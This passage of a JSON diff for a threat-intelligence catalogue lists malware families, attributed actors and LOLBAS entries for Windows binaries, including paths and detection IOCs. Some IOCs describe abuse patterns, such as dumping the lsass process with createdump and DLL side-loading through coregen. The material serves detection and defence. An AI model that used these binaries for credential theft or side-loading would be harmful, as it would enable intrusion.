"bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "b7dacd5c-eaba-48db-bdd7-e779a82b2ba7", + "type": "similar" + } + ], + "uuid": "462f4c43-12e3-4901-b741-72e8c6e6e98a", + "value": "coregen.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.\n\n**Author:** Martin Sohn Christensen\n\n**Paths:**\n* C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe\n* C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=75XImxOOInU](https://www.youtube.com/watch?v=75XImxOOInU)\n* [https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html](https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html)\n\n**Detection:**\n* Sigma: [image_load_side_load_coregen.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml)\n* IOC: coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\"\n* IOC: coregen.exe loading .dll file not named coreclr.dll\n* IOC: coregen.exe command line containing -L or -l\n* IOC: coregen.exe command line containing unexpected/invald assembly name\n* IOC: coregen.exe application crash by invalid assembly name[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5209", + "source": "Tidal Cyber", + "tags": [ + "a19a158e-aec4-410a-8c3e-e9080b111183", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "462f4c43-12e3-4901-b741-72e8c6e6e98a", + "type": "similar" + } + ], + "uuid": "b7dacd5c-eaba-48db-bdd7-e779a82b2ba7", + "value": "coregen" + }, + { + "description": "This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)]", + "meta": { + "id": "e66db2f3-651c-44d4-91ad-fb4b6065ecbf" + }, + "related": [ + { + "dest-uuid": "3b193f62-2b49-4eff-bdf4-501fb8a28274", + "type": "similar" + } + ], + "uuid": "8af3037f-732c-433e-8689-701593604bae", + "value": "Sofacy" + }, + { + "description": "[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)]", + "meta": { + "id": "c75a41d8-df0f-4607-8b07-76747810a7d9" + }, + "related": [ + { + "dest-uuid": "3b193f62-2b49-4eff-bdf4-501fb8a28274", + "type": "similar" + } + ], + "uuid": "36d5d0ca-1bfc-45b1-ac54-2da2e1b2a5c7", + "value": "SOURFACE" + }, + { + "description": "[CORESHELL](https://app.tidalcyber.com/software/3b193f62-2b49-4eff-bdf4-501fb8a28274) is a downloader used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0137", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "60c18d06-7b91-4742-bae3-647845cd9d81", + "type": "similar" + }, + { + "dest-uuid": "8af3037f-732c-433e-8689-701593604bae", + "type": "similar" + }, + { + "dest-uuid": "36d5d0ca-1bfc-45b1-ac54-2da2e1b2a5c7", + "type": "similar" + } + ], + "uuid": "3b193f62-2b49-4eff-bdf4-501fb8a28274", + "value": "CORESHELL" + }, + { + "description": "", + "meta": { + "id": "3f0427ff-2b73-4275-b612-ba4f2d2d77c7" + }, + "related": [ + { + "dest-uuid": "43b317c6-5b4f-47b8-b7b4-15cd6f455091", + "type": "similar" + } + ], + "uuid": "b46da8df-d944-4bf0-b715-dad7dbc6d658", + "value": "TinyBaron" + }, + { + "description": "", + "meta": { + "id": "8df5fe1b-184a-4a87-9244-244eb3c5f92a" + }, + "related": [ + { + "dest-uuid": "43b317c6-5b4f-47b8-b7b4-15cd6f455091", + "type": "similar" + } + ], + "uuid": "f5f9ef72-8f34-47d6-a767-86b3b07ce00e", + "value": "BotgenStudios" + }, + { + "description": "", + "meta": { + "id": "9fafca05-8cff-41ae-beba-dd50db7d9c15" + }, + "related": [ + { + "dest-uuid": "43b317c6-5b4f-47b8-b7b4-15cd6f455091", + "type": "similar" + } + ], + "uuid": "d7724aad-70a0-40a8-ad43-a92bedb8f8fd", + "value": "NemesisGemina" + }, + { + "description": "[CosmicDuke](https://app.tidalcyber.com/software/43b317c6-5b4f-47b8-b7b4-15cd6f455091) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0050", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", + "type": "similar" + }, + { + "dest-uuid": "b46da8df-d944-4bf0-b715-dad7dbc6d658", + "type": "similar" + }, + { + "dest-uuid": "f5f9ef72-8f34-47d6-a767-86b3b07ce00e", + "type": "similar" + }, + { + "dest-uuid": "d7724aad-70a0-40a8-ad43-a92bedb8f8fd", + "type": "similar" + } + ], + "uuid": "43b317c6-5b4f-47b8-b7b4-15cd6f455091", + "value": "CosmicDuke" + }, + { + "description": "[CostaBricks](https://app.tidalcyber.com/software/ea9e2d19-89fe-4039-a1e0-467b14554c6f) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0614", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5d342981-5194-41e7-b33f-8e91998d7d88", + "type": "similar" + } + ], + "uuid": "ea9e2d19-89fe-4039-a1e0-467b14554c6f", + "value": "CostaBricks" + }, + { + "description": "", + "meta": { + "id": "e1880d53-16e2-4055-9da9-61fc13118bef" + }, + "related": [ + { + "dest-uuid": "c2353daa-fd4c-44e1-8013-55400439965a", + "type": "similar" + } + ], + "uuid": "58e77779-2cc6-4570-95a7-fb59b089ab28", + "value": "CozyDuke" + }, + { + "description": "", + "meta": { + "id": "d3c41287-ead9-42bd-9657-0280e926633f" + }, + "related": [ + { + "dest-uuid": "c2353daa-fd4c-44e1-8013-55400439965a", + "type": "similar" + } + ], + "uuid": "49b8f0f4-77aa-4c7e-925d-054102c7178b", + "value": "CozyBear" + }, + { + "description": "", + "meta": { + "id": "5694df56-a690-4ff9-9b19-467a190d26a9" + }, + "related": [ + { + "dest-uuid": "c2353daa-fd4c-44e1-8013-55400439965a", + "type": "similar" + } + ], + "uuid": "60187172-ade3-4d87-8d51-3b064838867d", + "value": "Cozer" + }, + { + "description": "", + "meta": { + "id": "d541afa1-c54a-4dc9-939b-aacc5251fc44" + }, + "related": [ + { + "dest-uuid": "c2353daa-fd4c-44e1-8013-55400439965a", + "type": "similar" + } + ], + "uuid": "8b01f729-fa16-4bd7-b5d3-2d84a1ecb32b", + "value": "EuroAPT" + }, + { + "description": "[CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0046", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "e6ef745b-077f-42e1-a37d-29eecff9c754", + "type": "similar" + }, + { + "dest-uuid": "58e77779-2cc6-4570-95a7-fb59b089ab28", + "type": "similar" + }, + { + "dest-uuid": "49b8f0f4-77aa-4c7e-925d-054102c7178b", + "type": "similar" + }, + { + "dest-uuid": "60187172-ade3-4d87-8d51-3b064838867d", + "type": "similar" + }, + { + "dest-uuid": "8b01f729-fa16-4bd7-b5d3-2d84a1ecb32b", + "type": "similar" + } + ], + "uuid": "c2353daa-fd4c-44e1-8013-55400439965a", + "value": "CozyCar" + }, + { + "description": "[CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313) collects Active Directory information to conduct lateral movement through targeted networks.[[CME Github September 2018](https://app.tidalcyber.com/references/a6e1e3b4-1b69-43b7-afbe-aedb812c5778)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0488", + "source": "MITRE", + "tags": [ + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "c4810609-7da6-48ec-8057-1b70a7814db0", + "type": "similar" + } + ], + "uuid": "47e710b4-1397-47cf-a979-20891192f313", + "value": "CrackMapExec" + }, + { + "description": "[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]", + "meta": { + "id": "47df2f27-f2a2-4857-8f0c-e75179b93b8c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a574b315-523c-45c3-8743-feb3d541e81a", + "type": "similar" + } + ], + "uuid": "8a49e7dc-04ce-44d3-919d-91700e11e1c9", + "value": "Createdump.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)\n\n**Author:** mr.d0x, Daniel Santos\n\n**Paths:**\n* C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe\n* C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\*\\createdump.exe\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe\n\n**Resources:**\n* [https://twitter.com/bopin2020/status/1366400799199272960](https://twitter.com/bopin2020/status/1366400799199272960)\n* [https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps](https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps)\n\n**Detection:**\n* Sigma: [proc_creation_win_proc_dump_createdump.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml)\n* Sigma: [proc_creation_win_renamed_createdump.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml)\n* IOC: createdump.exe process with a command line containing the lsass.exe process id[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5210", + "source": "Tidal Cyber", + "tags": [ + "7beee233-2b65-4593-88e6-a5c0c02c6a08", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8a49e7dc-04ce-44d3-919d-91700e11e1c9", + "type": "similar" + } + ], + "uuid": "a574b315-523c-45c3-8743-feb3d541e81a", + "value": "Createdump" + }, + { + "description": "CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.[[CERTFR-2023-CTI-009](/references/5365ac4c-fbb8-4389-989e-a64cb7693371)][[SecurityScorecard CredoMap September 2022](/references/3e683efc-4712-4397-8d55-4354ff7ad9f0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5074", + "source": "Tidal Cyber", + "tags": [ + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + } + ], + "uuid": "516ffd19-72b9-43a1-b866-bb075fdcb137", + "value": "CredoMap" + }, + { + "description": "[CreepyDrive](https://app.tidalcyber.com/software/7f7f05c3-fbb1-475e-b672-2113709065c8) is a custom implant has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]\n\n[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]", + "meta": { + "platforms": [ + "Office 365", + "Windows" + ], + "software_attack_id": "S1023", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7fbd7514-76e9-4696-8c66-9f95546e3315", + "type": "used-by" + }, + { + "dest-uuid": "750eb92a-7fdf-451e-9592-1d42357018f1", + "type": "similar" + } + ], + "uuid": "7f7f05c3-fbb1-475e-b672-2113709065c8", + "value": "CreepyDrive" + }, + { + "description": "[CreepySnail](https://app.tidalcyber.com/software/11ce380c-481b-4c9b-b44e-06f1a91c01c1) is a custom PowerShell implant that has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least 2022.[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1024", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7fbd7514-76e9-4696-8c66-9f95546e3315", + "type": "used-by" + }, + { + "dest-uuid": "d23de441-f9cf-4802-b1ff-f588a11a896b", + "type": "similar" + } + ], + "uuid": "11ce380c-481b-4c9b-b44e-06f1a91c01c1", + "value": "CreepySnail" + }, + { + "description": "[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]", + "meta": { + "id": "b5691880-3483-4eb2-8075-a6232299f4bd" + }, + "related": [ + { + "dest-uuid": "3b3f296f-20a6-459a-98c5-62ebdee3701f", + "type": "similar" + } + ], + "uuid": "349d3f77-068f-4300-98b9-05245f5f3a7a", + "value": "MSIL/Crimson" + }, + { + "description": "[Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f) is a remote access Trojan that has been used by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) since at least 2016.[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0115", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "used-by" + }, + { + "dest-uuid": "326af1cd-78e7-45b7-a326-125d2f7ef8f2", + "type": "similar" + }, + { + "dest-uuid": "349d3f77-068f-4300-98b9-05245f5f3a7a", + "type": "similar" + } + ], + "uuid": "3b3f296f-20a6-459a-98c5-62ebdee3701f", + "value": "Crimson" + }, + { + "description": "[CrossRAT](https://app.tidalcyber.com/software/38811c3b-f548-43fa-ab26-c7243b84a055) is a cross platform RAT.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0235", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7ad94dbf-9909-42dd-8b62-a435481bdb14", + "type": "used-by" + }, + { + "dest-uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea", + "type": "similar" + } + ], + "uuid": "38811c3b-f548-43fa-ab26-c7243b84a055", + "value": "CrossRAT" + }, + { + "description": "[Crutch](https://app.tidalcyber.com/software/e1ad229b-d750-4148-a1f3-36e767b03cd1) is a backdoor designed for document theft that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2015.[[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0538", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "925a6c52-5cf0-4fec-99de-b0d6917d8593", + "type": "similar" + } + ], + "uuid": "e1ad229b-d750-4148-a1f3-36e767b03cd1", + "value": "Crutch" + }, + { + "description": "[Cryptoistic](https://app.tidalcyber.com/software/12ce6d04-ebe5-440e-b342-0283b7c8a0c8) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08).[[SentinelOne Lazarus macOS July 2020](https://app.tidalcyber.com/references/489c52a2-34cc-47ff-b42b-9d48f83b9e90)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0498", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "type": "similar" + } + ], + "uuid": "12ce6d04-ebe5-440e-b342-0283b7c8a0c8", + "value": "Cryptoistic" + }, + { + "description": "[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]", + "meta": { + "id": "2f3dd328-c1cb-4711-92a8-c1762925f427", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "939eeb6b-3f74-43b6-8ead-644457ee7d78", + "type": "similar" + } + ], + "uuid": "909a545e-eec1-4c0d-a57e-a183bf036bb6", + "value": "Csc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used by .NET to compile C# code\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe](https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_csc_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml)\n* Sigma: [proc_creation_win_csc_susp_folder.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml)\n* Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_unusal_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml)\n* IOC: Csc.exe should normally not run as System account unless it is used for development.[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5096", + "source": "Tidal Cyber", + "tags": [ + "2ee25dd6-256c-4659-b1b6-f5afc943ccc1", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "909a545e-eec1-4c0d-a57e-a183bf036bb6", + "type": "similar" + } + ], + "uuid": "939eeb6b-3f74-43b6-8ead-644457ee7d78", + "value": "Csc" + }, + { + "description": "[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]", + "meta": { + "id": "85524fce-888e-4754-ad46-8635c24c0d12", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "83036c61-d8cf-42f8-a9e5-dc3d26d75cdc", + "type": "similar" + } + ], + "uuid": "589c7b11-190b-4cd3-b8c4-cf623697d207", + "value": "Cscript.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to execute scripts in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cscript.exe\n* C:\\Windows\\SysWOW64\\cscript.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Cscript.exe executing files from alternate data streams\n* IOC: DotNet CLR libraries loaded into cscript.exe\n* IOC: DotNet CLR Usage Log - cscript.exe.log[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5097", + "source": "Tidal Cyber", + "tags": [ + "7cae5f59-dbbf-406f-928d-118430d2bdd0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "589c7b11-190b-4cd3-b8c4-cf623697d207", + "type": "similar" + } + ], + "uuid": "83036c61-d8cf-42f8-a9e5-dc3d26d75cdc", + "value": "Cscript" + }, + { + "description": "[[csi.exe - LOLBAS Project](/references/b810ee91-de4e-4c7b-8fa8-24dca95133e5)]", + "meta": { + "id": "adf2b27f-3e99-42a9-8d00-45d15feb8b05", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a11e4ebf-59e4-4b79-8a20-be1618dfbaed", + "type": "similar" + } + ], + "uuid": "bebeee27-af58-4daa-ae34-c432ba0aaf0d", + "value": "csi.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command line interface included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe\n* c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe\n\n**Resources:**\n* [https://twitter.com/subTee/status/781208810723549188](https://twitter.com/subTee/status/781208810723549188)\n* [https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/](https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/)\n\n**Detection:**\n* Sigma: 